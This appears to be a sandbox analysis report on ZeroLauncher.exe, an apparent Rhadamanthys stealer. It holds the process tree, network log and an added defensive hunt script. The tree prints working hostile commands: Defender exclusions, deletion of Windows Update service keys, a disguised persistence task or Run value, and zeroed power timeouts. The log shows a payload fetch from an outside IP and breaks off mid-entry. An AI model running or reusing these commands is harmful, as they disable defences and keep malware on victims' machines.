Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win11-20240802-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    04/10/2024, 04:54 UTC

General

  • Target

    ZeroLauncher.exe

  • Size

    19KB

  • MD5

    982e4ae4559538cfb529dfaff0507880

  • SHA1

    a3b0e3989d6e40792134286e40448004ebeda077

  • SHA256

    95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd

  • SHA512

    35d23d332c0389b3d3e7086613e60d73c158a7dd408bc4320ccb10aba8c2755ea99bf0d484cd257d53d42a6fe95a9bab0c606e7c580039aa5334767a4096662f

  • SSDEEP

    384:/LVHmcPXblyCKGK9dnORWsK7PPZzcuIYZKJHtZW39cDpbJO:/hHHPbICKJEW7PPeQKy6db

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 4 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 5 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utility used to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:644
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:568
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{16c568ad-859b-4e98-a696-079e26fda204}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3068
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:704
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:996
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:1040
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1048
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:1056
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1068
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1148
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1240
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        PID:552
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:432
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:3968
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:616
                          • C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                            C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                            2⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:4656
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                          1⤵
                            PID:1252
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1332
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1400
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1492
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:700
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                    1⤵
                                    • Indicator Removal: Clear Windows Event Logs
                                    PID:1608
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                    1⤵
                                      PID:1644
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1660
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1668
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1748
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1828
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1860
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1136
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1708
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1808
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2064
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:2076
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2204
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2244
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p
                                                              1⤵
                                                                PID:2380
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2388
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2428
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2476
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2500
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2516
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2552
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                            1⤵
                                                                              PID:2564
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2572
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:1076
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                  1⤵
                                                                                    PID:2776
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                      PID:3328
                                                                                      • C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe"
                                                                                        2⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4252
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                                                                                          3⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2848
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
        4⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3232
      • C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe
        "C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe"
        4⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2652
      • C:\Users\Admin\AppData\Local\Temp\LicCheck.exe
        "C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"
        4⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2100
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
          5⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4944
          • C:\Windows\System32\Conhost.exe
            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            6⤵
            PID:5000
      • C:\Users\Admin\AppData\Local\Temp\LicSend.exe
        "C:\Users\Admin\AppData\Local\Temp\LicSend.exe"
        4⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2416
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    2⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4884
  • C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    2⤵
    • Suspicious use of WriteProcessMemory
    PID:3344
    • C:\Windows\System32\sc.exe
      sc stop UsoSvc
      3⤵
      • Launches sc.exe
      PID:4720
    • C:\Windows\System32\sc.exe
      sc stop WaaSMedicSvc
      3⤵
      • Launches sc.exe
      PID:3132
    • C:\Windows\System32\sc.exe
      sc stop wuauserv
      3⤵
      • Launches sc.exe
      PID:4768
    • C:\Windows\System32\sc.exe
      sc stop bits
      3⤵
      • Launches sc.exe
      PID:4000
    • C:\Windows\System32\sc.exe
      sc stop dosvc
      3⤵
      • Launches sc.exe
      PID:3312
    • C:\Windows\System32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      3⤵
      PID:4212
    • C:\Windows\System32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      3⤵
      PID:228
    • C:\Windows\System32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      3⤵
      • Modifies security service
      PID:236
    • C:\Windows\System32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      3⤵
      PID:2728
    • C:\Windows\System32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      3⤵
      PID:928
  • C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    2⤵
    • Power Settings
    • Suspicious use of WriteProcessMemory
    PID:3484
    • C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      3⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:4152
    • C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      3⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:3880
    • C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      3⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:4860
    • C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      3⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:3052
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    2⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:5108
  • C:\Windows\System32\dialer.exe
    C:\Windows\System32\dialer.exe
    2⤵
    PID:2376
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  1⤵
  PID:3444
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  1⤵
  PID:3500
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  PID:3856
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  PID:3924
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  1⤵
  PID:3984
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
  1⤵
  PID:4016
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
  1⤵
  PID:4268
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
  1⤵
  PID:4356
• C:\Windows\system32\SppExtComObj.exe
  C:\Windows\system32\SppExtComObj.exe -Embedding
  1⤵
  PID:4804
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  1⤵
  PID:3992
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
  1⤵
  PID:2280
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
  1⤵
  PID:3416
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  1⤵
  PID:4468
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  1⤵
  • Modifies data under HKEY_USERS
  PID:3732
• C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  1⤵
  • Drops file in System32 directory
  • Modifies data under HKEY_USERS
  PID:2164
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  1⤵
  PID:4556
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  1⤵
  PID:3420
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
  1⤵
  PID:2096
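Added hunt script, not part of the Triage report or of the sample. The process tree above records a fixed set of host changes: Add-MpPreference excluding the whole user profile and Program Files from Defender; sc stop followed by reg delete of the five Windows Update service keys (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc); the svcupdater task, where /sc once /st 00:00 /du 9999:59 /ri 1 turns a one-shot task into one that repeats every minute for the whole duration; the PowerShell one-liner that, when elevated, registers GoogleUpdateTaskMachineQC as SYSTEM at startup (schtasks on Windows older than 6.2, Register-ScheduledTask otherwise) and, when not elevated, falls back to an HKCU Run value; and powercfg zeroing every standby and hibernate timeout. The script checks another Windows host for the same artifacts. Task names, paths and service names come from the report; the Lic*.exe pattern, the path regex, the Sysmon Event 22 check and the event-log-cleared IDs are this example's own assumptions.

```powershell
# Added hunt script (not from the Triage report or the sample). Run from an elevated session.
# Names and paths are copied from the report; the checks themselves are this example's own.

function Invoke-ZeroLauncherHunt {
    [CmdletBinding()] param()
    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. Defender exclusions. The sample excluded $env:UserProfile and $env:ProgramFiles, so
    #    flag any ExclusionPath that is a profile root or a Program Files root (regex assumed).
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    foreach ($p in @($pref.ExclusionPath)) {
        if ($p -and $p -match '^[A-Za-z]:\\(Users\\[^\\]+|Program Files( \(x86\))?)\\?$') {
            $findings.Add("Defender ExclusionPath covers a broad directory: $p")
        }
    }

    # 2. Service keys the sample removed with 'reg delete'. A missing key means the service
    #    cannot start again until it is re-registered.
    foreach ($svc in 'UsoSvc','WaaSMedicSvc','wuauserv','bits','dosvc') {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
        if (-not (Test-Path -Path $key)) { $findings.Add("Service key missing: $key") }
    }

    # 3. Scheduled tasks named in the report. 'GoogleUpdateTaskMachineQC' imitates the
    #    GoogleUpdateTaskMachine* names of a Chrome install but runs updater.exe instead.
    foreach ($name in 'svcupdater','GoogleUpdateTaskMachineQC') {
        $task = Get-ScheduledTask -TaskName $name -ErrorAction SilentlyContinue
        if ($task) {
            $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
            $findings.Add("Scheduled task '$name' ($($task.State)) runs: $actions")
        }
    }

    # 4. Non-admin fallback: a Run value in the infected user's hive. Walk every loaded hive
    #    under HKEY_USERS rather than only the HKCU of the account running this script.
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    foreach ($hive in Get-ChildItem -Path 'HKU:\' -ErrorAction SilentlyContinue) {
        $runKey = "$($hive.PSPath)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        $val = Get-ItemProperty -Path $runKey -Name 'GoogleUpdateTaskMachineQC' -ErrorAction SilentlyContinue
        if ($val) {
            $findings.Add("Run value in $($hive.PSChildName): $($val.GoogleUpdateTaskMachineQC)")
        }
    }

    # 5. Dropped files. The report ran as 'Admin'; check every profile. The Lic*.exe pattern
    #    is an assumption covering LicenseGet.exe, LicCheck.exe and LicSend.exe.
    $dropped = @('C:\Program Files\Google\Chrome\updater.exe',
                 'C:\Users\*\AppData\Roaming\Win32Sync\svcupdater.exe',
                 'C:\Users\*\AppData\Local\Temp\Lic*.exe')
    foreach ($pattern in $dropped) {
        Get-Item -Path $pattern -ErrorAction SilentlyContinue | ForEach-Object {
            $findings.Add("Dropped file present: $($_.FullName) (modified $($_.LastWriteTime))")
        }
    }

    # 6. Power settings. The sample set standby and hibernate timeouts to 0 ("never") on AC
    #    and DC; read the active scheme back through powercfg's alias names.
    foreach ($setting in 'STANDBYIDLE','HIBERNATEIDLE') {
        $out = powercfg /query SCHEME_CURRENT SUB_SLEEP $setting 2>$null
        foreach ($src in 'AC','DC') {
            $m = $out | Select-String "Current $src Power Setting Index: 0x([0-9A-Fa-f]+)" | Select-Object -First 1
            if ($m -and [Convert]::ToInt32($m.Matches[0].Groups[1].Value, 16) -eq 0) {
                $findings.Add("Power timeout $setting on $src is 0 (never)")
            }
        }
    }

    # 7. Clearing a log leaves its own record: Security 1104 and System 104.
    foreach ($f in @(@{LogName='Security'; Id=1104}, @{LogName='System'; Id=104})) {
        Get-WinEvent -FilterHashtable $f -MaxEvents 5 -ErrorAction SilentlyContinue | ForEach-Object {
            $findings.Add("$($f.LogName) log cleared at $($_.TimeCreated) (event $($f.Id))")
        }
    }

    # 8. Network side: the report shows powershell.exe resolving bitbucket.org. If Sysmon is
    #    installed with DNS logging (Event 22; an assumption, the report does not say so),
    #    list which image made that query.
    Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=22} -MaxEvents 20000 -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = @{}
            foreach ($x in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$x.Name] = $x.'#text' }
            if ($d.QueryName -like '*bitbucket.org') {
                $findings.Add("DNS query for $($d.QueryName) by $($d.Image) at $($_.TimeCreated)")
            }
        }

    return $findings
}

Invoke-ZeroLauncherHunt | ForEach-Object { Write-Output "[!] $_" }
```

Weigh the findings rather than counting them: zero power timeouts are a normal default on many VMs and servers, and UsoSvc or WaaSMedicSvc being stopped is routine, so only the deleted service keys, the named tasks and Run value, and the dropped files are strong on their own. The Defender exclusion check runs the same Get-MpPreference cmdlet the sample abused, so it needs the Defender module to be present.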

                                                                                                                                Network

                                                                                                                                • flag-us
                                                                                                                                  DNS
                                                                                                                                  bitbucket.org
                                                                                                                                  powershell.exe
                                                                                                                                  Remote address:
                                                                                                                                  8.8.8.8:53
                                                                                                                                  Request
                                                                                                                                  bitbucket.org
                                                                                                                                  IN A
                                                                                                                                  Response
                                                                                                                                  bitbucket.org
                                                                                                                                  IN A
                                                                                                                                  185.166.142.21
                                                                                                                                  bitbucket.org
                                                                                                                                  IN A
                                                                                                                                  185.166.142.23
                                                                                                                                  bitbucket.org
                                                                                                                                  IN A
                                                                                                                                  185.166.142.22
                                                                                                                                • flag-us
                                                                                                                                  DNS
                                                                                                                                  21.142.166.185.in-addr.arpa
                                                                                                                                  powershell.exe
                                                                                                                                  Remote address:
                                                                                                                                  8.8.8.8:53
                                                                                                                                  Request
                                                                                                                                  21.142.166.185.in-addr.arpa
                                                                                                                                  IN PTR
                                                                                                                                  Response
• flag-us  DNS  nexusrules.officeapps.live.com  (powershell.exe)
  Remote address: 8.8.8.8:53
  Request:  nexusrules.officeapps.live.com  IN A
  Response: nexusrules.officeapps.live.com  IN CNAME  prod.nexusrules.live.com.akadns.net
            prod.nexusrules.live.com.akadns.net  IN A  52.111.227.14
• flag-us  DNS  self.events.data.microsoft.com  (powershell.exe)
  Remote address: 8.8.8.8:53
  Request:  self.events.data.microsoft.com  IN A
  Response: self.events.data.microsoft.com  IN CNAME  self-events-data.trafficmanager.net
            self-events-data.trafficmanager.net  IN CNAME  onedscolprdweu04.westeurope.cloudapp.azure.com
            onedscolprdweu04.westeurope.cloudapp.azure.com  IN A  20.50.201.200
• flag-us  DNS  8.8.8.8.in-addr.arpa  (NetworkService)
  Remote address: 8.8.8.8:53
  Request:  8.8.8.8.in-addr.arpa  IN PTR
  Response: 8.8.8.8.in-addr.arpa  IN PTR  dnsgoogle
• flag-us  DNS  95.53.214.95.in-addr.arpa  (NetworkService)
  Remote address: 8.8.8.8:53
  Request:  95.53.214.95.in-addr.arpa  IN PTR
  Response:
• flag-us  DNS  14.227.111.52.in-addr.arpa  (NetworkService)
  Remote address: 8.8.8.8:53
  Request:  14.227.111.52.in-addr.arpa  IN PTR
  Response:
• flag-us  DNS  200.201.50.20.in-addr.arpa  (NetworkService)
  Remote address: 8.8.8.8:53
  Request:  200.201.50.20.in-addr.arpa  IN PTR
  Response:
• flag-pl  GET  http://95.214.53.95/blob/d.ez  (LicenseGet.exe)
  Remote address: 95.214.53.95:80
  Request:
    GET /blob/d.ez HTTP/1.1
    Host: 95.214.53.95
    User-Agent: curl/5.9
    Connection: close
    X-CSRF-TOKEN: q3TKg5Sb+qdmLIXOMVSCPaYWSiU6kIogTRFZ6WZ+cmBgvfXRc08Jk2FHR/cH3s/smFp9YkFA8Tvb7bfqySL+sw==
    Cookie: CSRF-TOKEN=q3TKg5Sb+qdmLIXOMVSCPaYWSiU6kIogTRFZ6WZ+cmBgvfXRc08Jk2FHR/cH3s/smFp9YkFA8Tvb7bfqySL+sw==; LANG=en-US
  Response:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 04 Oct 2024 04:54:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
• flag-pl  GET  http://95.214.53.95/blob/d.ez  (LicenseGet.exe)
  Remote address: 95.214.53.95:80
  Request:
    GET /blob/d.ez HTTP/1.1
    Host: 95.214.53.95
    User-Agent: curl/5.9
    Connection: close
    X-CSRF-TOKEN: GPqrE3xdciaz4k8Tqe32ATXxL6Zarzj8x47w7fDSUpYx/VU6Uy7RpKZHWlrIFKqxK0fSXKRVq2h/4kihh+sO2g==
    Cookie: CSRF-TOKEN=GPqrE3xdciaz4k8Tqe32ATXxL6Zarzj8x47w7fDSUpYx/VU6Uy7RpKZHWlrIFKqxK0fSXKRVq2h/4kihh+sO2g==; LANG=en-US
  Response:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 04 Oct 2024 04:55:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
• flag-pl  GET  http://95.214.53.95/blob/d.ez  (LicenseGet.exe)
